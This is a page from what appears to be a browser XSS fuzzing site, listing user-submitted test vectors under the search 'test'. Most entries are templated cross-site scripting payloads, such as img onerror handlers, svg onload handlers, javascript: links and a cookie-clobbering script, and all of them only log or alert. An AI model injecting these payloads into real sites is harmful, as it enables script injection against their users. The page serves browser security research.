Featured vector
No vectors found in the last 30 days
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,424,269 Successful fuzzes
Fuzz Vectors
Searching for "test"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| test uno | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> | @Artys_san |
| SVG test 3 | *chr*><svg/*chr*onload*chr**chr**chr*=*chr**chr**chr*logChr(*num*)*raw1*><svg/*chr**datahtmlattributes**chr**chr**chr*=*chr**chr**chr*logChr(*num*)*raw1*> | @ahpaleus |
| New test 12 | <!-- sample vector --> <*chr**chr**chr**chr*svg/*chr*onload=alert(*num*)*chr*> | @ahpaleus |
| New test 2 | <!-- sample vector --> <*chr**chr**chr**chr*svg/*chr*onload=alert(*num*)*chr*> | @ahpaleus |
| qqqsqdqd test | <a href="http:*chr*//qq.com">aaa</a> | @1baicai1 |
| http test | <a href="javascript*chr*logChr(*num*)">aaa</a> | @1baicai1 |
| doc property hijack with iframe v3 | <script> var testpad = document.createElement("iframe"); testpad.name="dummy"; document.body.appendChild(testpad); for(props in document){ testpad.name = props; if (document[props]+"" === "[object Window]") { customLog(props) } } </script> | @insertScript |
| overwrite cookies test case | <*datahtmlelements* name="cookie"></*datahtmlelements*> <script> window.addEventListener("load",function(){ for(a in document.cookie){ customLog(document.cookie[a].tagName); } },false); </script> | @insertScript |
| slash bla htest | <a href="/*chr*google.com" id="fuzzelement*num*">asdf</a> <script> if(document.getElementById('fuzzelement*num*').hostname=="google.com") { logChr(*num*); } </script> | @insertScript |
| random test | <!DOCTYPE html> <html lang = "en-US"> <head> <meta charset = "UTF-8"> <title>monty.html</title> <link rel = "stylesheet" type = "text/css" href = "monty.css" /> </head> <body> <h1>Monty Python Quiz</h1> <form action = "monty.php" method = "post"> <fieldset> <p> <label>What is your name?</label> <select name = "name"> <option value = "Roger"> Roger the Shrubber </option> <option value = "Arthur"> Arthur, King of the Britons </option> <option value = "Tim"> Tim the Enchanter </option> </select> </p> <p> <label>What is your quest?</label> <span> <input type = "radio" name = "quest" value = "herring" /> To chop down the mightiest tree in the forest with a herring </span> <span> <input type = "radio" name = "quest" value = "grail" /> I seek the holy grail. </span> <span> <input type = "radio" name = "quest" value = "shrubbery" /> I’m looking for a shrubbery. </span> </p> <p> <label>How can you tell she's a witch?</label> <span> <input type = "*raw3*" name = "*raw1*" value = "*raw2*"/> She's got a witch nose. </span> <span> <input type = "checkbox" name = "hat" value = "hat"/> She has a witch hat. </span> <span> <input type*chr**raw1*=*chr**raw1*"checkbox" name = "newt" value = "newt" /> *chr**chr**chr**chr**chr**raw1* </span> </p> <button type*chr**raw1*=*chr**raw1*"submit"> *chr**chr**chr**chr**chr**chr**raw1* </button> </fieldset> </form> </body> </html> | @kinmenhacker |
| test all | <table> <thead> <tr><td>*chr* *raw1*</td>*chr* *raw2*<td>*chr* *raw3*</td></tr> </thead> <tbody> <tr><td>*chr* *raw1*</td>*chr* *raw2*<td>*chr* *raw3*</td></tr> </tbody> </table>*urlenc**uni**hex6**hex4**hex2**chr**num**datacsspropertynames**datadhtmlprops**dataentities**dataevents**datahtmlattributes**datahtmlattributes**datahtmlattributes**datahtmlelements**datahtmlelements2**dataints**datajscsspropertynames**datajsproperties**datajstest**datajstest3**datajstest4**datajstest5**datamathelements**datamyevents**dataprotocols**dataShortHtmlAttributes**dataShortHtmlElements**datasvgelements* | @kinmenhacker |
| XSS Without Space Test 1 | <!-- sample vector --> <link rel="canonical" href="http://example.com/path/test"><img*chr*src="xx:xx"onerror="logChr(*num*)"> | @irsdl |
| kinmens test | <!-- sample vector --> <*hex2**hex4**hex6**num**chr**urlenc**uni*> | @kinmenhacker |
| test3_kinmen | <!-- sample vector --> <img src=http://www.kinmen.gov.tw/*chr* onerror=logChr(*num*)> | @kinmenhacker |
| test for progress | <progress value="*num*" max="*num*"></progress> | @kinmenhacker |
| test for tag name | <*chr* width="*num*px">*datajstest4**datajstest4**datajstest4**dataShortHtmlAttributes**dataShortHtmlAttributes**dataShortHtmlAttributes**datajstest4* | @kinmenhacker |
| justatest2 | <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> | @evilcos |